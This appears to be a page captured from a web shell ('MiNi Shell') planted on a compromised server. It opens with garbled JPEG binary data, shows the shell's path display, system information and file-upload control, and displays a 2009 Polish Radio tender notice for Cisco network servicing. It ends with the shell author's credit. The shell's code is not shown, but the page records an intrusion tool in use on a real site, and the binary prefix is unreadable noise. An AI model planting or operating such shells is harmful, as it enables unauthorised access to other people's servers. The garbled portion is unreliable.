JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090904/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090904/147607-N-2009.html

<p class="kh_header"><b>Warszawa: Usługa serwisowa urządzeń sieciowych firmy Cisco Systems na okres 3 lat (znak sprawy : DK/WPzp-43/09)</b><br>
<b>Numer ogłoszenia: 147607 - 2009; data zamieszczenia: 04.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Polskie Radio S.A. Dział Obsługi Zamówień Publicznych , Al. Niepodległości 77/85, 00-977 Warszawa, woj. mazowieckie, tel. 022 6459359, faks 022 6453959, 6455996.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.prsa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa serwisowa urządzeń sieciowych firmy Cisco Systems na okres 3 lat (znak sprawy : DK/WPzp-43/09).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usługi serwisowej urządzeń sieciowych firmy CISCO zainstalowanych w sieci komputerowej Zamawiającego na następujących warunkach:
1.	Serwis Cisco SMARTnet Next Business Day (NBD) świadczony dla urządzeń sieciowych  wyspecyfikowanych w  tabeli  zatytułowanej  Lista urządzeń  objętych  serwisem, zawartej w niniejszym Załączniku nr 1, określanym niżej jako Załącznik nr 1.
2.	Wykonawca dostarczy w terminie 30 dni kalendarzowych od podpisania umowy, dokument potwierdzający zarejestrowanie kontraktu serwisowego dla urządzeń wyspecyfikowanych w Załączniku nr 1, wystawiony przez producenta serwisowanego sprzętu lub jego oficjalnego przedstawiciela, oraz dokument  potwierdzający bezpośredni dostęp Zamawiającego do Cisco TAC i Cisco CCO, oba wystawione na okres 12 miesięcy.
3.	W okresie obowiązywania umowy Wykonawca dostarczać będzie Zamawiającemu, przed upływem terminu ważności dokumentów określonych w pkt. 2, dokumenty wystawione na kolejne  okresy 12 miesięczne.
4.	W przypadku otrzymania informacji od Zamawiającego o wystąpieniu awarii urządzeń wyspecyfikowanych w Załączniku nr 1, Wykonawca zapewni konsultacje swojego inżyniera CCIE, polegające na diagnozie zgłoszonej awarii i określeniu sposobu rozwiązania problemu. Zamawiający zgłaszać będzie do Wykonawcy awarie w dni robocze w godz. 9.00 - 17.00 w następujący sposób: telefonicznie (potwierdzając niezwłocznie zgłoszenie faksem), FAKSEM LUB POCZTĄ ELEKTRONICZNĄ. Rozpoczęcie świadczenia konsultacji nastąpi w terminie nie przekraczającym 4 godzin od momentu zgłoszenia awarii przez Zamawiającego, z zastrzeżeniem,  iż do świadczenia konsultacji w sprawie awarii zgłoszonych po godzinie 15.00 Wykonawca przystąpi o godz. 9.00 następnego dnia roboczego. Jeżeli świadczenie konsultacji drogą telefoniczną lub pocztą elektroniczną okaże się niewystarczające do stwierdzenia  przyczyn awarii i określenia sposobu rozwiązania problemu, inżynier CCIE Wykonawcy zobowiązany  będzie do  niezwłocznego przyjazdu na miejsce wystąpienia awarii. Decyzję o konieczności przyjazdu podejmuje uprawniony pracownik Zamawiającego, wskazany w Umowie.
5.	W przypadku, kiedy usunięcie awarii wymagać będzie wymiany urządzenia wadliwego na wolne od wad, Wykonawca poinformuje o powyższym Zamawiającego faksem lub pocztą elektroniczną wraz z informacją o zgłoszeniu przez Wykonawcę wymiany urządzenia wadliwego do producenta.  Zamawiający powinien otrzymać taką informację nie później niż do godziny 14.00 następnego dnia roboczego, liczonego od dnia, w którym Wykonawca był zobowiązany do rozpoczęcia świadczenia konsultacji.  
6.	Jeżeli usunięcie awarii możliwe będzie bez konieczności wymiany urządzenia wadliwego na wolne od wad, Wykonawca zobowiązany będzie usunąć awarię do godziny 24.00 następnego dnia roboczego, liczonego od dnia, w którym Wykonawca był zobowiązany do rozpoczęcia świadczenia konsultacji.  
7.	W przypadku stwierdzenia w trakcie konsultacji przez  inżyniera CCIE  Wykonawcy,  iż wystąpiła  awaria, która może być usunięta tylko poprzez wymianę urządzenia wadliwego, Wykonawca zawiadomi  producenta tego  urządzenia  o konieczności jego wymiany  na  takie same urządzenie, fabrycznie nowe, wolne od wad. Zawiadomienie powinno być przekazane do Cisco Centrum Pomocy Technicznej (TAC). Wykonawca gwarantuje, iż producent dostarczy fabrycznie nowe urządzenie, wolne od wad do godziny 17.00 następnego dnia roboczego pod warunkiem, iż zgłoszenie do Cisco Centrum Pomocy Technicznej (TAC) dokonane zostało do godz. 15.00. Jeżeli zgłoszenie nastąpi po godzinie 15.00 czas na dostawę nowego urządzenia będzie liczony od następnego dnia roboczego.
8.	Wymiany urządzenia wadliwego na urządzenie fabrycznie nowe, wolne od wad, w miejscu instalacji, dokona inżynier CCIE lub CCNP Wykonawcy. Wymiana urządzenia i jego uruchomienie, zapewniające przywrócenie funkcjonalności sprzed awarii, dokonane zostaną nie później niż do godziny 24.00 trzeciego dnia roboczego liczonego od dnia, w którym Wykonawca  był zobowiązany do rozpoczęcia świadczenia konsultacji. Serwis urządzenia fabrycznie nowego, dostarczonego w miejsce urządzenia wadliwego, świadczony będzie na takich samych zasadach, jak serwis urządzeń wymienionych w Załączniku nr 1.
9.	Wykonawca na żądanie Zamawiającego będzie wykonywał w cyklu kwartalnym aktualizację oprogramowania systemowego (w ramach zakupionej przez Zamawiającego wersji funkcjonalnej) urządzeń wyspecyfikowanych w Załączniku nr 1, w godzinach wskazanych przez Zamawiającego, w miejscu instalacji urządzeń. W przypadku dokonania uaktualnienia oprogramowania przez Wykonawcę, Wykonawca zobowiązany będzie w terminie 14 dni do dostarczenia aktualnej licencji potwierdzonej przez producenta serwisowanego sprzętu lub jego oficjalnego przedstawiciela wystawionej na Zamawiającego.
10.	Ze względu na specyfikę działalności Zamawiającego, Zamawiający uprawniony jest do  opóźnienia terminu rozpoczęcia usuwania awarii przez Wykonawcę w siedzibie Zamawiającego.  W takim przypadku termin usunięcia awarii ulegnie odpowiedniemu wydłużeniu o czym Zamawiający powiadomi Wykonawcę telefonicznie (potwierdzając niezwłocznie faksem), FAKSEM LUB POCZTĄ ELEKTRONICZNĄ.  
11.	Wykonawca w terminie do 30 dni kalendarzowych od daty podpisania umowy zapewni Zamawiającemu bezpośredni, rejestrowany dostęp do Cisco Centrum Pomocy Technicznej (TAC) przez dwadzieścia cztery godziny na dobę, umożliwiający pomoc w związku z używaniem zgłoszonych w Załączniku nr 1 urządzeń, ich konfiguracją i rozwiązywaniem problemów dotyczących ich eksploatacji łącznie z możliwością bezpośredniego otwierania zgłoszeń serwisowych do Cisco Centrum Pomocy Technicznej (TAC) przez Zamawiającego bez limitu na ilość zapytań.
12.	Wykonawca w terminie 30 dni kalendarzowych od daty podpisania umowy zapewni Zamawiającemu bezpośredni dostęp do strony internetowej Cisco CCO, gdzie zostaną udostępnione Zamawiającemu (bez ponoszenia dodatkowych opłat) uaktualnione wersje oprogramowania zainstalowanego na urządzeniach wyspecyfikowanych w Załączniku nr 1 (w ramach zakupionej przez Zamawiającego wersji funkcjonalnej) i dokumentacja w trybie online. 
13.	Serwis będący przedmiotem zamówienia świadczony będzie przez okres 36-ciu miesięcy od daty dostarczenia przez Wykonawcę dokumentu potwierdzającego zarejestrowanie kontraktu serwisowego dla urządzeń wyspecyfikowanych w Załączniku nr 1 wystawionego przez producenta serwisowanego sprzętu lub jego oficjalnego przedstawiciela oraz dokumentu potwierdzającego bezpośredni dostęp  Zamawiającego do Cisco TAC i Cisco CCO.
14.	Wykonawca zapewni Zamawiającemu (w ramach świadczenia usługi serwisowej) miesięcznie dodatkowo 10 godzin konsultacji inżyniera CCIE Wykonawcy.
15.	Zgłoszenia serwisowe do Wykonawcy dokonywane będą w języku polskim.

lub usługi funkcjonalnie równoważnej, spełniającej wszystkie poniższe wymagania:
1.	Serwis urządzeń wyspecyfikowanych w tabeli zatytułowanej Lista urządzeń  objętych  serwisem w Załączniku nr 1, zapewniający dostawę nowego urządzenia w przypadku konieczności wymiany urządzenia, będzie świadczony na rzecz Zamawiającego przez producenta serwisowanego sprzętu.
2.	Wykonawca dostarczy w terminie 30 dni kalendarzowych od podpisania umowy, dokument potwierdzający zarejestrowanie kontraktu serwisowego dla urządzeń wyspecyfikowanych w Załączniku nr 1, wystawiony przez producenta serwisowanego sprzętu lub jego oficjalnego przedstawiciela, oraz dokument  potwierdzający bezpośredni dostęp Zamawiającego do Cisco TAC i Cisco CCO, oba wystawione na okres 12 miesięcy.
3.	W okresie obowiązywania umowy Wykonawca dostarczać będzie Zamawiającemu, przed upływem terminu ważności dokumentów określonych w pkt. 2, dokumenty wystawione na kolejne  okresy 12 miesięczne.  
4.	W przypadku otrzymania informacji od Zamawiającego o wystąpieniu awarii urządzeń wyspecyfikowanych w Załączniku nr 1, Wykonawca zapewni konsultacje swojego inżyniera CCIE, polegające na diagnozie zgłoszonej awarii i określeniu sposobu rozwiązania problemu. Zamawiający zgłaszać będzie do Wykonawcy awarie w dni robocze w godz. 9.00 - 17.00 w następujący sposób: telefonicznie (potwierdzając niezwłocznie zgłoszenie faksem), FAKSEM LUB POCZTĄ ELEKTRONICZNĄ. Rozpoczęcie świadczenia konsultacji nastąpi w terminie nie przekraczającym 4 godzin od momentu zgłoszenia awarii przez Zamawiającego, z zastrzeżeniem,  iż do świadczenia konsultacji w sprawie awarii zgłoszonych po godzinie 15.00 Wykonawca przystąpi o godz. 9.00 następnego dnia roboczego. Jeżeli świadczenie konsultacji drogą telefoniczną lub pocztą elektroniczną okaże się niewystarczające do stwierdzenia  przyczyn awarii i określenia sposobu rozwiązania problemu, inżynier CCIE Wykonawcy zobowiązany  będzie do  niezwłocznego przyjazdu na miejsce wystąpienia awarii. Decyzję o konieczności przyjazdu podejmuje uprawniony pracownik Zamawiającego, wskazany w Umowie.
5.	W przypadku, kiedy usunięcie awarii wymagać będzie wymiany urządzenia wadliwego na wolne od wad, Wykonawca poinformuje o powyższym Zamawiającego faksem lub pocztą elektroniczną wraz z informacją o zgłoszeniu przez Wykonawcę wymiany urządzenia wadliwego do producenta.  Zamawiający powinien otrzymać taką informację nie później niż do godziny 14.00 następnego dnia roboczego, liczonego od dnia, w którym Wykonawca był zobowiązany do rozpoczęcia świadczenia konsultacji.  
6.	Jeżeli usunięcie awarii możliwe będzie bez konieczności wymiany urządzenia wadliwego na wolne od wad, Wykonawca zobowiązany będzie usunąć awarię do godziny 24.00 następnego dnia roboczego, liczonego od dnia, w którym Wykonawca był zobowiązany do rozpoczęcia świadczenia konsultacji.  
7.	W przypadku stwierdzenia w trakcie konsultacji przez  inżyniera CCIE  Wykonawcy,  iż wystąpiła  awaria, która może być usunięta tylko poprzez wymianę urządzenia wadliwego, Wykonawca zawiadomi  producenta tego  urządzenia  o konieczności jego wymiany  na  takie same urządzenie, fabrycznie nowe, wolne od wad. Zawiadomienie powinno być przekazane do Cisco Centrum Pomocy Technicznej (TAC). Wykonawca gwarantuje, iż producent dostarczy fabrycznie nowe urządzenie, wolne od wad do godziny 17.00 następnego dnia roboczego pod warunkiem, iż zgłoszenie do Cisco Centrum Pomocy Technicznej (TAC) dokonane zostało do godz. 15.00. Jeżeli zgłoszenie nastąpi po godzinie 15.00 czas na dostawę nowego urządzenia będzie liczony od następnego dnia roboczego.
8.	Wymiany urządzenia wadliwego na urządzenie fabrycznie nowe, wolne od wad, w miejscu instalacji, dokona inżynier CCIE lub CCNP Wykonawcy. Wymiana urządzenia i jego uruchomienie, zapewniające przywrócenie funkcjonalności sprzed awarii, dokonane zostaną nie później niż do godziny 24.00 trzeciego dnia roboczego liczonego od dnia, w którym Wykonawca  był zobowiązany do rozpoczęcia świadczenia konsultacji. Serwis urządzenia fabrycznie nowego, dostarczonego w miejsce urządzenia wadliwego, świadczony będzie na takich samych zasadach, jak serwis urządzeń wymienionych w Załączniku nr 1. 
9.	Wykonawca na żądanie Zamawiającego będzie wykonywał w cyklu kwartalnym aktualizację oprogramowania systemowego (w ramach zakupionej przez Zamawiającego wersji funkcjonalnej) urządzeń wyspecyfikowanych w Załączniku nr 1, w godzinach wskazanych przez Zamawiającego, w miejscu instalacji urządzeń. W przypadku dokonania uaktualnienia oprogramowania przez Wykonawcę, Wykonawca zobowiązany będzie w terminie 14 dni do dostarczenia aktualnej licencji potwierdzonej przez producenta serwisowanego sprzętu lub jego oficjalnego przedstawiciela wystawionej na Zamawiającego.
10.	Ze względu na specyfikę działalności Zamawiającego, Zamawiający uprawniony jest do  opóźnienia terminu rozpoczęcia usuwania awarii przez Wykonawcę w siedzibie Zamawiającego.  W takim przypadku termin usunięcia awarii ulegnie odpowiedniemu wydłużeniu o czym Zamawiający powiadomi Wykonawcę telefonicznie (potwierdzając niezwłocznie faksem), FAKSEM LUB POCZTĄ ELEKTRONICZNĄ.  
11.	Wykonawca w terminie do 30 dni kalendarzowych od daty podpisania umowy zapewni Zamawiającemu bezpośredni, rejestrowany dostęp do Cisco Centrum Pomocy Technicznej (TAC) przez dwadzieścia cztery godziny na dobę, umożliwiający pomoc w związku z używaniem zgłoszonych w Załączniku nr 1 urządzeń, ich konfiguracją i rozwiązywaniem problemów dotyczących ich eksploatacji łącznie z możliwością bezpośredniego otwierania zgłoszeń serwisowych do Cisco Centrum Pomocy Technicznej (TAC)  przez Zamawiającego bez limitu na ilość zapytań.
12.	Wykonawca w terminie 30 dni kalendarzowych od daty podpisania umowy zapewni Zamawiającemu bezpośredni dostęp do strony internetowej Cisco CCO, gdzie zostaną udostępnione Zamawiającemu (bez ponoszenia dodatkowych opłat) uaktualnione wersje oprogramowania zainstalowanego na urządzeniach wyspecyfikowanych w Załączniku nr 1 (w ramach zakupionej przez Zamawiającego wersji funkcjonalnej) i dokumentacja w trybie online. 
13.	Serwis będący przedmiotem zamówienia świadczony będzie przez okres 36-ciu miesięcy od daty dostarczenia przez Wykonawcę dokumentu potwierdzającego zarejestrowanie kontraktu serwisowego dla urządzeń wyspecyfikowanych w Załączniku nr 1 wystawionego przez producenta serwisowanego sprzętu lub jego oficjalnego przedstawiciela oraz dokumentu potwierdzającego bezpośredni dostęp  Zamawiającego do Cisco TAC i Cisco CCO.
14.	Wykonawca zapewni Zamawiającemu (w ramach świadczenia usługi serwisowej) miesięcznie dodatkowo 10 godzin konsultacji inżyniera CCIE Wykonawcy.
15.	Zgłoszenia serwisowe do Wykonawcy dokonywane będą w języku polskim.
Szczegółowy wykaz urządzeń zawiera załącznik nr 1 do SIWZ - Opis przedmiotu zamówienia.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 50.31.23.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 12.1	Oferta powinna być zabezpieczona wadium w następującej wysokości: 20 000,00 zł (słownie: dwadzieścia tysięcy złotych zero groszy)
12.2  Wadium wpłaca/wnosi się przed upływem terminu składania ofert w następujących formach (w zależności od wyboru Wykonawcy):
a)	w pieniądzu, wpłaconym na konto:
Polskie Radio SA Powszechna Kasa Oszczędności Bank Polski SA,
I Oddział Centrum w Warszawie, nr 71102010130000080200025486;
b)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)	w gwarancjach bankowych; 
d)	w gwarancjach ubezpieczeniowych;
e)	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy 
z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości 
( tj. Dz. U. 2007 r. Nr 42, poz. 275 ze zm).
12.3	W przypadku wniesienia wadium w formie gwarancji bankowej bądź ubezpieczeniowej, koniecznym jest, aby gwarancja obejmowała odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez wykonawcę, określone w art. 46 ust. 4a i 5 ustawy. Koniecznym jest również, aby gwarancja obejmowała cały okres związania ofertą określony w SIWZ. W przypadku, gdy gwarancja bankowa lub ubezpieczeniowa nie spełni któregokolwiek ze wskazanych powyżej wymogów, Zamawiający wykluczy Wykonawcę 
z postępowania. W przypadku wniesienia wadium w formie innej niż w pkt. 12.2 a) SIWZ konieczne jest zdeponowanie oryginału dowodu wniesienia wadium w kasie PR - SA, nowy budynek, parter (kasa czynna jest w dni robocze  godzinach 1000-1200, tel. 022 645-92-22).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 5.1 W postępowaniu mogą wziąć udział wykonawcy, którzy:
5.1.1 posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 
5.1.2 posiadają niezbędną wiedzę i doświadczenie, w tym  wykonali lub wykonują w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 zamówienia odpowiadające swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia. Przez zamówienie odpowiadające swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia Zamawiający rozumie usługę serwisową urządzeń sieciowych firmy Cisco Systems
o wartości 500 000,00 zł brutto każda, z załączeniem dokumentów potwierdzających, że usługa ta została wykonana lub jest wykonywana należycie w ww. okresie. 
5.1.3	dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, w tym co najmniej 2 osobami posiadającymi certyfikat CCIE firmy Cisco Systems lub przedstawią pisemne zobowiązanie innych podmiotów do udostępniania potencjału technicznego i osób zdolnych do wykonania zamówienia; 
5.1.4 znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
5.1.5 nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego.

5.2 Ocena spełnienia powyższych warunków zostanie dokonana na podstawie dokumentów,    wymienionych w pkt 6.1 SIWZ, według kryteriów :spełnia-nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> a) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
b) oświadczenie, że Wykonawca spełnia warunki określone w art. 22 ust. 1 ustawy na załączniku nr 7 do SIWZ, a w przypadku niespełniania przez Wykonawcę warunków dotyczących potencjału technicznego  i osobowego dokumenty zawierające pisemne zobowiązanie innych podmiotów do udostępniania potencjału technicznego i osób zdolnych do wykonania zamówienia;
   c) wypełniony na załączniku nr 2 do SIWZ Wykaz osób, które będą uczestniczyć 
w  wykonywaniu zamówienia, na potwierdzenie warunku określonego w pkt. 5.1.3 SIWZ
d)	aktualne dokumenty osób wskazanych w załączniku nr 2 do SIWZ na potwierdzenie posiadanych kwalifikacji;
e)	wypełniony na załączniku nr 3 do SIWZ Wykaz wykonanych usług na potwierdzenie spełniania warunku określonego w pkt 5.1.2 SIWZ;
f)	dokumenty potwierdzające, że usługi wymienione w załączniku nr 3 do SIWZ zostały wykonane należycie;
g)	pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia w przypadku samodzielnego nie spełnienia warunku dysponowania osobami zdolnymi do wykonania zamówienia..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.prsa.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> PR-S.A. al. Niepodległości 77/85, 00-977 Warszawa (stary budynek) piętro IV, pok. 418 (pon-pt w godz. 8:00-16:00).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.09.2009 godzina 11:45, miejsce: PR-S.A. al. Niepodległości 77/85, 00-977 Warszawa, skrzynka w holu (nowy budynek) oznaczona: Przetarg na usługę serwisową urządzeń sieciowych firmy Cisco Systems na okres 3 lat (znak: DK/WPzp-43/09).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com